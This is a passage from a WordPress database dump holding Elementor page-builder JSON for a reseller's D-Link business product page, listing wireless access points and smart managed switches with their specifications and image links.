Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":27},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3604,2659,'_elementor_version','0.4'),(3607,2660,'_wp_page_template','template-fullwidth.php'),(3608,2660,'_elementor_edit_mode','builder'),(3609,2660,'_elementor_template_type','post'),(3610,2660,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G 